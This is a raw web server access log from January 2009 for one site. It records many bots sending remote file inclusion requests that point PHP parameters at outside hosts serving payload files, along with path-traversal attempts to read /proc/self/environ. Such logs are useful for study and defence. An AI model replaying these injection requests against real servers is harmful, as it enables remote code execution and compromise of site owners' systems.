77.222.40.234 - - [04/Jan/2009:17:22:10 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:22:10 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:22:45 -0800] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
208.79.205.235 - - [04/Jan/2009:17:25:17 -0800] "GET /index.php?custompluginfile%5B%5D=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.vspeaking.com"
208.79.205.235 - - [04/Jan/2009:17:25:17 -0800] "GET /logs//index.php?custompluginfile%5B%5D=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.vspeaking.com"
208.79.205.235 - - [04/Jan/2009:17:25:17 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.vspeaking.com"
208.79.205.235 - - [04/Jan/2009:17:25:17 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.vspeaking.com"
208.79.205.235 - - [04/Jan/2009:17:25:17 -0800] "GET /logs//index.php?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
208.79.205.235 - - [04/Jan/2009:17:25:17 -0800] "GET /index.php?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
208.79.205.235 - - [04/Jan/2009:17:25:17 -0800] "GET /index.php?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
208.79.205.235 - - [04/Jan/2009:17:25:17 -0800] "GET /logs//index.php?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:26:52 -0800] "GET /logs/access_080908.log/?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:26:52 -0800] "GET /?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:26:52 -0800] "GET /logs/?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.810" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:26:52 -0800] "GET /logs/access_081006.log/?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
221.143.42.108 - - [04/Jan/2009:17:27:55 -0800] "GET /logs/access_080915.log//config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:17:28:13 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:28:27 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:17:28:30 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.813" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:17:28:30 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:17:28:37 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.813" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:17:28:37 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:28:45 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:29:16 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:29:16 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:29:18 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:29:18 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:30:00 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 200 2654 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:30:00 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 200 2654 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:30:00 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:30:00 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.821" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:30:07 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.805" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:30:08 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:30:08 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.805" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:30:08 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:30:08 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:30:08 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:30:08 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:30:08 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:30:08 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:30:39 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:31:25 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:31:26 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
113.30.66.5 - - [04/Jan/2009:17:31:37 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
89.36.39.203 - - [04/Jan/2009:17:31:52 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:32:07 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:17:34:34 -0800] "GET /logs/access_081208.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:17:34:34 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:17:34:34 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.813" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:35:00 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:35:00 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:35:02 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:35:02 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:35:06 -0800] "GET /logs/access_081208.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:35:07 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:35:07 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.805" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:35:12 -0800] "GET /logs/?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.810" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:35:12 -0800] "GET /?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:35:28 -0800] "GET /logs/access_081208.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:35:28 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:35:28 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 200 2654 "-" "libwww-perl/5.821" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:35:30 -0800] "GET /logs/access_081208.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:35:30 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:35:30 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.805" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:42 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:43 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:35:43 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:16 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:16 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:36:16 -0800] "GET /logs/access_081208.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:36:17 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:36:17 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.79" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:20 -0800] "GET /logs/access_081208.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:20 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:20 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:28 -0800] "GET /logs/access_081208.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:36:28 -0800] "GET /logs/access_081208.log/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:36:28 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:36:28 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:28 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:28 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:31 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:31 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:31 -0800] "GET /logs/access_081208.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:32 -0800] "GET /logs/access_081208.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:32 -0800] "GET /logs/access_081208.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:32 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:32 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:32 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:32 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:32 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:36:32 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:37:46 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.822" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:37:46 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:40:10 -0800] "GET /logs/access_081013.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:17:40:13 -0800] "GET //eva/index.php3?aide=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
113.30.66.5 - - [04/Jan/2009:17:40:26 -0800] "GET /logs/access_081208.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
113.30.66.5 - - [04/Jan/2009:17:40:26 -0800] "GET /?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
113.30.66.5 - - [04/Jan/2009:17:40:27 -0800] "GET /logs/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:17:41:08 -0800] "GET /logs/scripts.log///eva/index.php3?aide=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:17:41:09 -0800] "GET //eva/index.php3?aide=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:17:41:09 -0800] "GET /logs///eva/index.php3?aide=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:41:25 -0800] "GET /logs/access_081013.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
211.235.245.121 - - [04/Jan/2009:17:42:25 -0800] "GET /logs//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.235.245.121 - - [04/Jan/2009:17:42:25 -0800] "GET /logs/access_081208.log//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.235.245.121 - - [04/Jan/2009:17:42:25 -0800] "GET /main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:43:09 -0800] "GET /logs/access_080915.log//main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:43:09 -0800] "GET /main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:43:10 -0800] "GET /logs//main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:43:10 -0800] "GET /logs/access_080901.log//main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
211.235.245.121 - - [04/Jan/2009:17:43:12 -0800] "GET /logs/access_081222.log//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:17:43:19 -0800] "GET /logs/access_081013.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:43:26 -0800] "GET /logs/access_081013.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
211.235.245.121 - - [04/Jan/2009:17:43:38 -0800] "GET /logs/access.log//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:43:42 -0800] "GET /logs/access_081013.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:43:55 -0800] "GET /logs/access_081013.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
64.20.40.194 - - [04/Jan/2009:17:44:44 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.20.40.194 - - [04/Jan/2009:17:44:44 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.20.40.194 - - [04/Jan/2009:17:44:44 -0800] "GET /logs/access_081208.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.17.137.41 - - [04/Jan/2009:17:44:51 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.17.137.41 - - [04/Jan/2009:17:44:51 -0800] "GET /logs/access_081208.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
